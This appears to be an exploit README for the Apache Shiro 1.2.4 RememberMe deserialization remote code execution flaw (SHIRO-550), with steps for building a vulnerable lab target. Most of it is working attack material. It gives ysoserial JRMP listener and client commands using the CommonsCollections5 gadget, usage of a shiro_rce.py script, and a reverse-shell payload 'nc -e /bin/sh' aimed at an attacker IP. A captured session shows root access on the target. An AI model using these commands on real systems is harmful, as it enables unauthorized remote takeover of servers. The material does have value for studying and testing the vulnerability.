Shiro RememberMe 1.2.4 Deserialization Vulnerability (SHIRO-550)
commons-collections-3.2.1.jar
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient "10.10.20.166:12345" |python exp.py
java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 12345 CommonsCollections5 'nc -e /bin/sh 192.168.5.86 8989'
nc -nlvp 8989
Python usage:
python3 shiro_rce.py
_____ _ _ _____ _____ ____ _____ _____ ___
/ ____| | | |_ _| __ \ / __ \ | ____| ____|/ _ \
| (___ | |__| | | | | |__) | | | |______| |__ | |__ | | | |
\___ \| __ | | | | _ /| | | |______|___ \|___ \| | | |
____) | | | |_| |_| | \ \| |__| | ___) |___) | |_| |
|_____/|_| |_|_____|_| \_\____/ |____/|____/ \___/
Shiro RememberMe 1.2.4 反序列化漏洞
[+] Usage: python3 shiro_rce.py http://10.10.20.166:8080/shiro/ command
Building samples-web-1.2.4.war:
git clone https://github.com/apache/shiro.git
cd shiro
git checkout shiro-root-1.2.4
mvn install
Maven version:
mvn -v
Apache Maven 3.6.2 (40f52333136460af0dc0d7232c0dc0bcf0d9e117; 2019-08-27T11:06:16-04:00)
Maven home: /opt/apache-maven-3.6.2
Java version: 1.8.0_60, vendor: Oracle Corporation, runtime: /opt/jdk1.8.0_60/jre
Default locale: en_US, platform encoding: UTF-8
OS name: "linux", version: "4.19.0-kali1-amd64", arch: "amd64", family: "unix"
cat ~/.m2/toolchains.xml
<?xml version="1.0" encoding="UTF8"?>
<toolchains>
<toolchain>
<type>jdk</type>
<provides>
<version>1.6</version>
<vendor>sun</vendor>
</provides>
<configuration>
<jdkHome>/opt/jdk/jdk1.6.0_45</jdkHome>
</configuration>
</toolchain>
</toolchains>
Reverse shell
python3 shiro_rce.py http://10.10.20.166:8080/samples-web-1.2.4/ "nc -e /bin/sh 192.168.5.86 9999"
_____ _ _ _____ _____ ____ _____ _____ ___
/ ____| | | |_ _| __ \ / __ \ | ____| ____|/ _ \
| (___ | |__| | | | | |__) | | | |______| |__ | |__ | | | |
\___ \| __ | | | | _ /| | | |______|___ \|___ \| | | |
____) | | | |_| |_| | \ \| |__| | ___) |___) | |_| |
|_____/|_| |_|_____|_| \_\____/ |____/|____/ \___/
Shiro RememberMe 1.2.4 反序列化漏洞
2019-10-25 13:43:33
[+] Send POC Success
[+] Exit Shiro RCE Vuln
C:\Users\CTF>nc -nlvp 9999
listening on [any] 9999 ...
connect to [192.168.5.86] from (UNKNOWN) [10.10.20.166] 38656
id
uid=0(root) gid=0(root) groups=0(root)
cd /tmp
ls
123123123123
Reference links:
http://blog.orange.tw/2018/03/pwn-ctf-platform-with-java-jrmp-gadget.html
https://bling.kapsi.fi/blog/jvm-deserialization-broken-classldr.html